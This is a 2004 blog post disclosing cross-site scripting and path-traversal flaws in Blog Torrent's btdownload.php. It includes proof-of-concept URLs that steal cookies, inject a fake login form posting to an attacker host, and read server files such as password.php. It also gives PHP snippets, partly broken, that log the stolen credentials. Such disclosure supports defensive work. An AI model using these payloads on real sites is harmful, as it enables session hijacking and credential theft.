variable 'file' in Blog Torrent 'btdownload.php' imput validation error(cross-site scripting)

Tuesday, December 07, 2004
####################################
variable 'file' in Blog Torrent 'btdownload.php'
imput validation error(cross-site scripting)
vendor : www.blogtorrent.com/
http://sourceforge.net/tracker/index.php?func=detail&aid=1080615&group_id=109524&atid=654202
Preview Version 0.8
vendor notified: yes exploit included:yes
impact:execute javascriptcode,remote file inclusion.
remote command execution.
OSVDB ID:12250 , 12251
Securitytracker:1012452
####################################



Blogs torrent is a web php script for managing
torrent links and users fron the blog and other options...

Variable 'file' in Blog Torrent 'btdownload.php'have and input
validation error and permits insert javascripts and execute code
and remote file inclusion, remote command execution Vulnerability

froof of concept :

get cookie session:

http://[target]/bittorrent_module/btdownload.php?
file=<script>alert(document.cookie)</script>



http://[target]/bittorrent_module/btdownload.php?
file=<script>document.write(document.cookie)</script>



insert content :


http://[target]/bittorrent_module/btdownload.php?

file=<img%20src=http://www.google.es/images/logo_sm.gif>


insert remote web :


http://[target]/bittorrent_module/btdownload.php?
file=<iframe%20src=http://www.google.es/></iframe>


insert remote data base:

http://[target]/bittorrent_module/btdownload.php?
file=<form%20action="http://www.atacker.com/savedb.php"%
20method="post">Username:<input%20name="username"%20type=
"text"%20maxlength="30">Password:<input%20name="password"
%20type="text"%20maxlength="30"><input%20name="login"%20
type="submit"%20value="Login"></form>



in sabedb.php i have query strings to save variables password

and username

sabedb.php obtain the cookie

<?

$archivo = 'tostada.txt';

$fp = fopen($archivo, "a");

$string = "$cookie";

$write = fputs($fp, $string);

fclose($fp);

?>

and save it into a txt

and save the user and password


<?php

mysql_db_query("passwordssss","insert into $usuario (usuario,pass)

values ('$usuario','$password')";

?>


whith this values what user put and sabe in a lite data base contains

only 2 tables password & username :)



disclosure username and password hash



http://[target]/torrent_blog/btdownload.php?file=<iframe%20src=../data/users></iframe>

or

http://[target]/torrent_blog/btdownload.php?file=<iframe%20src=http://[target]/torrent_blog/data/users></iframe>


download arbitraies files of the server or blog :



http://[target]/torrent_blog/btdownload.php?type=torrent&file=[path%file]

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../password.php

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../settings.php

http://[target]/torrent_blog/btdownload.php?type=torrent&file=../login.php




securitytracker url: http://www.securitytracker.com/alerts/2004/Dec/1012452.html

atentamente

Lostmon (lostmon@gmail.com)


thnx to estrella to be my ligth

thnx to all who believed in me
--
La curiosidad es lo que hace mover la mente...

Post by Lostmon in 5:26:00 AM
Categories: , ,
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...